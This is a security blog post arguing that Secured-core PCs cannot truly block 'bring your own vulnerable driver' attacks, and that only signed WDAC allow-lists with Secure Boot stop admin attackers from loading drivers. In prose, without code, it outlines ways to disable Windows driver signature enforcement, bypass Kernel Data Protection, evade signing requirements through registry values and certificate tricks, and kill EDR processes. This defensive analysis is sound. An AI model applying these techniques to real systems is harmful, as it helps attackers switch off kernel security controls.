For some reason, there’s a collective hallucination that Bring Your Own Vulnerable Driver (BYOVD) protection is a thing that’s achievable, and something that you should do. Let’s look into how this happened…
In 2020, Microsoft advertised Secured-core PCs, and included a curious statement:
Defending against these types of threats—whether those that live off the land by using what’s already on the machine or those that bring in vulnerable drivers as part of their attack chain—requires a fresh approach to security, one that combines threat defense on multiple levels: silicon, operating system, and cloud.
Secured-core PCs enable the full set of HVCI-provided exploit mitigations, but let’vs look at the specifically troublesome part of that statement:
those that bring in vulnerable drivers
The message being conveyed is: If you buy a Secured-core PC, you can protect against attackers that bring their own vulnerable drivers. Let’s see if this statement is grounded in reality.
Why do attackers use drivers? There are several things that a driver can accomplish that an attacker might want, including (list courtesy Rapid7):
Disabling Driver Signature Enforcement (DSE)
Note: For reasons we will see, this reason is a touch meta. That is, an attacker is bringing their own vulnerable driver to… bring their own driver?
In some cases, drivers that allow these things to happen may already be present on a system that is being attacked. If the driver is vulnerable, these actions may not even require admin privileges to pull off.
A vulnerable driver being present on a system can make an attacker’s life easier. But what about this “BYOVD” thing that I keep hearing about? Attackers are doing this in the wild, so it’s something we should worry about, right? Let’s look at some facts about the Windows driver world and how it affects attackers:
In order to bring a driver, an attacker must have admin privileges.
To clarify “Administrator-to-kernel is not a security boundary”, imagine that you have two drivers:
Driver A provides kernel memory read/write to all users.
Driver B provides kernel memory read/write to administrator users.
Driver A would be considered vulnerable because it allows non-administrator users to modify kernel memory. On the other hand Driver B is not considered vulnerable because it requires a user with admin privileges to take action. Because “Administrator to Kernel” is not a security boundary, abuse of the driver would not cross any security boundary, and therefore there is no vulnerability at play.
Attackers are indeed bringing vulnerable drivers in attacks occurring in the wild. Now, think about whether the “vulnerable” part of that statement matters. Remember to avoid logical fallacies in the process.
A vulnerable driver allows non-admin users to do dangerous things.
An attacker bringing their own driver already has admin privileges.
Given this, what does an attacker get out of bringing a vulnerable driver to their game? If I were an attacker, I’d probably choose a driver that was not vulnerable, just to stay under the radar a touch more, as opposed to setting off alarm bells by using a driver that is known to be vulnerable.
For certain activities, an admin-privileged attacker can simply bring a non-vulnerable driver to achieve their goal.
If the goal is to kill a protected EDR process, an attacker can simply use a driver that exposes ZwTerminateProcess to admin users. If the driver only exposes ZwTerminateProcess
to admin users, then it would not be considered a vulnerable driver. However, it’s allowing an admin-privileged attacker to do something that might be useful to them.
An example ZwTerminateProcess
driver that isn’t vulnerable is interesting, but the holy grail of proving that BYOVD protection is a lie would be to show that an admin-privileged attacker can load an unsigned or invalid-signed driver, or failing that, showing that an attacker can load a driver that has a valid signature but has not been approved by Microsoft. This would open up the attack to be able to universally leverage anything that a driver can do.
The KDU exploit is a universal driver exploit that can leverage a driver that has a kernel memory read/write primitive to achieve a number of useful goals. Including the ability to disable Windows Driver Signature Enforcement (DSE). While the drivers that KDU comes with are generally considered “vulnerable” in that non-admin users can leverage their functionality, it’s important to realize that a non-vulnerable driver with the same read-write privileges can be used to achieve the same goal. And because KDU requires admin privileges to run, the use of a vulnerable driver is even less relevant.
For example, here we see KDU using rtcore64.sys
to set the CiVariableAddress
value using a read/write primitive, which disables the driver signature-checking enforcement in Windows.
If you attempt to disable DSE on an HVCI-enabled Windows system, you’ll get a different, unpleasant result:
Why is this? It’s not actually HVCI itself that provides this protection (ATTEMPTED WRITE TO READONLY MEMORY
), but rather it’s Kernel Data Protection (KDP) that provides the protection. A naive attempt to write to a protected kernel memory location will fail. And sometimes catastrophically (in a BSOD). Does this mean that an HVCI-enabled system will prevent an attacker from disabling the driver signature check?
The Microsoft article that introduces KDP makes a statement that is a clue to how its protections might be able to be bypassed:
KDP does not enforce how the virtual address range mapping a protected region is translated.
What this means is that while the original memory location might benefit from read-only memory permissions, an attacker can remap the memory by modifying the page table, which will result in the memory having read-write privileges. From Intel VT-rp - Part 1. remapping attack and HLAT:
Just like over time exploits were modified to take advantage of ROP to bypass the NX protection introduced by AMD, we can expect exploits like KDU to be eventually modified to take advantage of memory remapping to bypass protections added by KDP.
So that’s it? We’ve proved that BYOVD protection is a lie, right?
Cisco Talos published a blog post: https://blog.talosintelligence.com/old-certificate-new-signature/ , which describes a technique that is being used in the wild to skip the requirement that Windows drivers are approved by the Microsoft Developer Portal.
Microsoft states: Starting with Windows 10, version 1607, Windows will not load any new kernel-mode drivers which are not signed by the Dev Portal.
The presumed goal here is to give a certain amount of control to Microsoft over Windows drivers. Drivers that are blatantly malicious or vulnerable might not get the approval from Microsoft, resulting in a driver that Windows will refuse to load by default.
But as the Talos blog post explains, the above policy seems to be an intended goal as opposed to a fact. Why? By playing games with modifying a cross-signing certificate’s date, Windows will treat the driver with the pre-1607 policy, which is to not require the Developer Portal signature.
This means that an attacker can load a malicious driver in Windows, as long as it has a valid signature, which can be accomplished by simply purchasing one, or by using a signing key that has been leaked, stolen, or otherwise made available to the attacker.
So there’s no need for a vulnerable driver when we can just use a malicious driver. That’s the final nail in the BYOVD protection coffin, right?
Sure, an attacker might play certificate games as outlined by the Talos blog post to get past the Developer Portal signing requirement. But since we’re talking about cases where the attacker is an admin (since they’re bringing a driver), even this is over-thinking things. Why? An admin user can simply tell Windows to use the pre-1607 behavior.
As outlined in https://www.geoffchappell.com/notes/security/whqlsettings/index.htm, Windows can be reverted to a configuration where it does not require drivers to be signed by the Microsoft Developer Portal by setting the UpgradedSystem
and BootUpgradedSystem
registry values.
How many nails does this BYOVD protection coffin need?
So you want to protect against BYOD? This is a laudable (yet achievable) goal. However, as with just about anything security-related, achieving this improvement comes at a cost of increased maintenance.
Windows Defender Application Control (WDAC) can be used to control what applications and drivers Windows will allow to run. For example, the Microsoft recommended driver block rules policy that recent versions of Windows use to block vulnerable drivers is implemented as a WDAC policy.
This is a useful feature to prevent the presence of a vulnerable driver on a system before an attacker arrives. Note that this feature will not block an attacker that is in a position to attempt a BYOVD attack, though. Such an attacker already has admin privileges by nature of bringing their own driver, and an admin user of a Windows system can simply modify or disable WDAC settings to their liking.
WDAC settings can be made tamper resistant by using signed policies. Part of the deployment for signed WDAC policies is to deploy the signed policy into the system’s EFI partition. This type of WDAC deployment is tamper resistant by way of two behaviors:
If the WDAC policy file in the Windows filesystem is modified or removed, Windows will simply use the copy of the policy in the EFI partition.
If the WDAC policy file in the EFI partition is modified or removed, SecureBoot will fail to boot Windows.
If a Windows system is to be protected against BYOD attacks, a WDAC policy must be created that only allows the set of drivers that have been approved for use on a system. That is, the WDAC policy must provide as specific “allow list” of drivers that may be loaded. Note that the Microsoft recommended driver block rules list includes an “Allow All” rule, so therefore this list by itself is not sufficient to protect against BYOD attacks. From the Microsoft recommended driver block rules list page:
The WDAC policy to specify what drivers are allowed to be loaded must also be signed before deployment to both Windows and the EFI partition. Once this signed WDAC deployment is complete, Windows should prevent an attacker from being able to bring their own driver.
Years ago, Microsoft mentioned that their Secured-core PCs will protect against BYOVD attacks. And as time has passed, this hallucination has propagated to the masses. It’s simply not currently a viable goal to aim to block BYOVD attacks, however. Preventing attackers from loading arbitrary drivers is a reasonable goal, which can be accomplished with the combination of SecureBoot and a signed WDAC policy. Without this combination of protections, it should be assumed that an admin-privileged attacker can load whatever drivers they want.
Advertising BYOVD protection is disingenuous, as any attacker that’s bringing a driver already has admin privileges, and as such they don’t need to bother with using a vulnerable driver.
Secured-core PCs are a good idea from a security perspective, with their HVCI and associated KDP features. However even Secured-core PCs cannot truthfully advertise BYOD (note the lack of “V”) protection. BYOD protection can be accomplished by way of a signed WDAC policy that is maintained and deployed to systems that are to be protected. Such protection is not deployed to the masses by way of them using a Secured-core PC that comes with standard Windows 11.